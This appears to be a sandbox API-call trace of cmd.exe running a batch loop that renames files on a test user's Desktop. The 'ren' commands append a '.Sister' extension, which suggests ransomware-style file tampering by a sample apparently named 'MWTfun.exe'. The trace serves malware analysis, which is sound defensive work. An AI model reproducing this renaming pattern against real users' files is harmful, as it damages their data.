[0147.639] malloc (_Size=0xffce) returned 0x21ed917fe80 [0147.641] ??_V@YAXPEAX@Z () returned 0x21ed917fe80 [0147.642] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0147.642] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0147.642] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0147.642] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0147.642] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0147.642] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0147.642] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0147.642] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0147.642] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0147.642] ??_V@YAXPEAX@Z () returned 0x1 [0147.642] GetProcessHeap () returned 0x21ed8c70000 [0147.642] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d66010 [0147.642] GetProcessHeap () returned 0x21ed8c70000 [0147.642] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66010, Size=0x130) returned 0x21ed8d66010 [0147.642] GetProcessHeap () returned 0x21ed8c70000 [0147.642] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66010) returned 0x130 [0147.642] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0147.642] malloc (_Size=0xffce) returned 0x21ed917fe80 [0147.642] ??_V@YAXPEAX@Z () returned 0x21ed917fe80 [0147.642] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0147.643] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed917fe80, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0147.647] ??_V@YAXPEAX@Z () returned 0x1 [0147.647] GetProcessHeap () returned 0x21ed8c70000 [0147.647] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d66150 [0147.648] GetProcessHeap () returned 0x21ed8c70000 [0147.648] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d66290 [0147.648] GetProcessHeap () returned 0x21ed8c70000 [0147.648] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66290, Size=0x130) returned 0x21ed8d66290 [0147.648] GetProcessHeap () returned 0x21ed8c70000 [0147.648] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66290) returned 0x130 [0147.648] malloc (_Size=0xffce) returned 0x21ed917fe80 [0147.648] ??_V@YAXPEAX@Z () returned 0x21ed917fe80 [0147.648] GetProcessHeap () returned 0x21ed8c70000 [0147.648] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43690 [0147.648] GetProcessHeap () returned 0x21ed8c70000 [0147.648] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5c8a0 [0147.648] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0147.648] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0147.648] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0147.648] GetLastError () returned 0x2 [0147.648] GetProcessHeap () returned 0x21ed8c70000 [0147.648] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93a0240 [0147.649] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93a0250 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0147.649] SetErrorMode (uMode=0x0) returned 0x0 [0147.649] SetErrorMode (uMode=0x1) returned 0x0 [0147.649] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed917fe80, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0147.649] SetErrorMode (uMode=0x0) returned 0x1 [0147.649] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0147.650] GetProcessHeap () returned 0x21ed8c70000 [0147.650] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93724a0 [0147.650] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0147.650] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0147.650] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0147.650] GetLastError () returned 0x2 [0147.650] ??_V@YAXPEAX@Z () returned 0x1 [0147.650] malloc (_Size=0xffce) returned 0x21ed917fe80 [0147.650] ??_V@YAXPEAX@Z () returned 0x21ed917fe80 [0147.650] malloc (_Size=0xffce) returned 0x21ed918fe60 [0147.650] ??_V@YAXPEAX@Z () returned 0x21ed918fe60 [0147.651] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0147.651] GetLastError () returned 0x2 [0147.651] _get_osfhandle (_FileHandle=2) returned 0x54 [0147.651] GetFileType (hFile=0x54) returned 0x2 [0147.651] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0147.651] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0147.674] _get_osfhandle (_FileHandle=2) returned 0x54 [0147.674] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0147.681] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0147.682] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0147.682] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0147.696] longjmp () [0147.696] ??_V@YAXPEAX@Z () returned 0x1 [0147.696] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc2bba0, ftCreationTime.dwHighDateTime=0x1d5f00b, ftLastAccessTime.dwLowDateTime=0xf22a9ec0, ftLastAccessTime.dwHighDateTime=0x1d5ef71, ftLastWriteTime.dwLowDateTime=0xf22a9ec0, ftLastWriteTime.dwHighDateTime=0x1d5ef71, nFileSizeHigh=0x0, nFileSizeLow=0x15b63, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="i6gjWm0aNWU1xM.swf", cAlternateFileName="")) returned 1 [0147.696] GetProcessHeap () returned 0x21ed8c70000 [0147.696] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d46410, Size=0x280) returned 0x21ed8d663d0 [0147.696] GetProcessHeap () returned 0x21ed8c70000 [0147.696] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d663d0) returned 0x280 [0147.697] GetProcessHeap () returned 0x21ed8c70000 [0147.697] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9376460 [0147.697] GetProcessHeap () returned 0x21ed8c70000 [0147.697] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9376460, Size=0x30) returned 0x21ed9376460 [0147.697] GetProcessHeap () returned 0x21ed8c70000 [0147.697] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9376460) returned 0x30 [0147.697] GetProcessHeap () returned 0x21ed8c70000 [0147.697] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93764a0 [0147.697] malloc (_Size=0x1ff9c) returned 0x21ed919fe40 [0147.700] GetProcessHeap () returned 0x21ed8c70000 [0147.700] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8d10 [0147.700] ??_V@YAXPEAX@Z () returned 0x1 [0147.700] GetProcessHeap () returned 0x21ed8c70000 [0147.700] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93764a0, Size=0x1a0) returned 0x21ed93764a0 [0147.700] GetProcessHeap () returned 0x21ed8c70000 [0147.700] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93764a0) returned 0x1a0 [0147.700] GetProcessHeap () returned 0x21ed8c70000 [0147.700] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9376650 [0147.700] GetProcessHeap () returned 0x21ed8c70000 [0147.701] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9376650, Size=0x290) returned 0x21ed9376650 [0147.701] GetProcessHeap () returned 0x21ed8c70000 [0147.701] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9376650) returned 0x290 [0147.701] GetProcessHeap () returned 0x21ed8c70000 [0147.701] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93768f0 [0147.701] GetProcessHeap () returned 0x21ed8c70000 [0147.701] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93768f0, Size=0x30) returned 0x21ed93768f0 [0147.701] GetProcessHeap () returned 0x21ed8c70000 [0147.701] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93768f0) returned 0x30 [0147.701] GetProcessHeap () returned 0x21ed8c70000 [0147.701] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9376930 [0147.701] malloc (_Size=0x1ff9c) returned 0x21ed919fe40 [0147.701] GetProcessHeap () returned 0x21ed8c70000 [0147.701] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8ad0 [0147.701] ??_V@YAXPEAX@Z () returned 0x1 [0147.701] malloc (_Size=0x1ff9c) returned 0x21ed919fe40 [0147.701] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d439f0 [0147.701] FindClose (in: hFindFile=0x21ed8d439f0 | out: hFindFile=0x21ed8d439f0) returned 1 [0147.702] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d43390 [0147.702] FindClose (in: hFindFile=0x21ed8d43390 | out: hFindFile=0x21ed8d43390) returned 1 [0147.702] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x822c673b, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x822c673b, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d43390 [0147.702] FindClose (in: hFindFile=0x21ed8d43390 | out: hFindFile=0x21ed8d43390) returned 1 [0147.702] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\i6gjWm0aNWU1xM.swf", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc2bba0, ftCreationTime.dwHighDateTime=0x1d5f00b, ftLastAccessTime.dwLowDateTime=0xf22a9ec0, ftLastAccessTime.dwHighDateTime=0x1d5ef71, ftLastWriteTime.dwLowDateTime=0xf22a9ec0, ftLastWriteTime.dwHighDateTime=0x1d5ef71, nFileSizeHigh=0x0, nFileSizeLow=0x15b63, dwReserved0=0x4, dwReserved1=0x80, cFileName="i6gjWm0aNWU1xM.swf", cAlternateFileName="I6GJWM~1.SWF")) returned 0x21ed8d42fd0 [0147.702] FindClose (in: hFindFile=0x21ed8d42fd0 | out: hFindFile=0x21ed8d42fd0) returned 1 [0147.703] _wcsnicmp (_String1="I6GJWM~1.SWF", _String2="i6gjWm0aNWU1xM.swf", _MaxCount=0x12) returned 78 [0147.703] malloc (_Size=0x1ff9c) returned 0x21ed91bfdf0 [0147.703] ??_V@YAXPEAX@Z () returned 0x21ed91bfdf0 [0147.705] GetProcessHeap () returned 0x21ed8c70000 [0147.705] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed8cc8c10 [0147.705] ??_V@YAXPEAX@Z () returned 0x1 [0147.705] ??_V@YAXPEAX@Z () returned 0x1 [0147.705] GetProcessHeap () returned 0x21ed8c70000 [0147.705] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9376930, Size=0x1a0) returned 0x21ed9376930 [0147.705] GetProcessHeap () returned 0x21ed8c70000 [0147.705] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9376930) returned 0x1a0 [0147.705] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0147.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.705] GetFileType (hFile=0x50) returned 0x2 [0147.705] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0147.706] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0147.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.716] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0147.786] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0147.786] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0147.787] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0147.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.787] GetFileType (hFile=0x50) returned 0x2 [0147.787] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0147.787] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0147.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.794] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0147.814] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.814] GetFileType (hFile=0x50) returned 0x2 [0147.814] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0147.814] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0147.825] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.825] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9376470*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9376470*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0147.829] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"i6gjWm0aNWU1xM.swf\" \"i6gjWm0aNWU1xM.swf.Sister\" ") returned 50 [0147.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.829] GetFileType (hFile=0x50) returned 0x2 [0147.829] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0147.830] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0147.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.832] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x32) returned 1 [0147.836] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0147.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.836] GetFileType (hFile=0x50) returned 0x2 [0147.836] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0147.836] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0147.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.842] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0147.846] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0147.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.846] GetFileType (hFile=0x50) returned 0x2 [0147.847] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0147.847] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0147.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.910] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0147.920] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0147.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.920] GetFileType (hFile=0x50) returned 0x2 [0147.920] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0147.920] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0147.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.924] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0147.925] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0147.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.925] GetFileType (hFile=0x50) returned 0x2 [0147.926] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0147.926] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0147.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.939] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0147.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.968] GetFileType (hFile=0x50) returned 0x2 [0147.968] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0147.968] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0147.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.971] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9376900*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9376900*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0148.093] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"i6gjWm0aNWU1xM.swf.Sister\" \"i6gjWm0aNWU1xM.bat\" ") returned 50 [0148.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.093] GetFileType (hFile=0x50) returned 0x2 [0148.093] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0148.093] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0148.109] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.109] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x32) returned 1 [0148.118] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0148.118] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.118] GetFileType (hFile=0x50) returned 0x2 [0148.119] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0148.119] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0148.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.121] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0148.139] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0148.193] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0148.193] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0148.193] malloc (_Size=0xffce) returned 0x21ed919fe40 [0148.193] ??_V@YAXPEAX@Z () returned 0x21ed919fe40 [0148.193] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0148.193] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0148.193] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0148.193] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0148.193] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0148.193] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0148.193] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0148.194] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0148.194] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0148.194] ??_V@YAXPEAX@Z () returned 0x1 [0148.194] GetProcessHeap () returned 0x21ed8c70000 [0148.194] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed8d46410 [0148.194] GetProcessHeap () returned 0x21ed8c70000 [0148.194] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d46410, Size=0x74) returned 0x21ed8d46410 [0148.197] GetProcessHeap () returned 0x21ed8c70000 [0148.197] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d46410) returned 0x74 [0148.197] GetProcessHeap () returned 0x21ed8c70000 [0148.197] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7c) returned 0x21ed8d464a0 [0148.197] GetProcessHeap () returned 0x21ed8c70000 [0148.197] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed8d46530 [0148.197] GetProcessHeap () returned 0x21ed8c70000 [0148.197] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d46530, Size=0x74) returned 0x21ed8d46530 [0148.197] GetProcessHeap () returned 0x21ed8c70000 [0148.197] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d46530) returned 0x74 [0148.197] malloc (_Size=0xffce) returned 0x21ed919fe40 [0148.197] ??_V@YAXPEAX@Z () returned 0x21ed919fe40 [0148.197] GetProcessHeap () returned 0x21ed8c70000 [0148.197] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43390 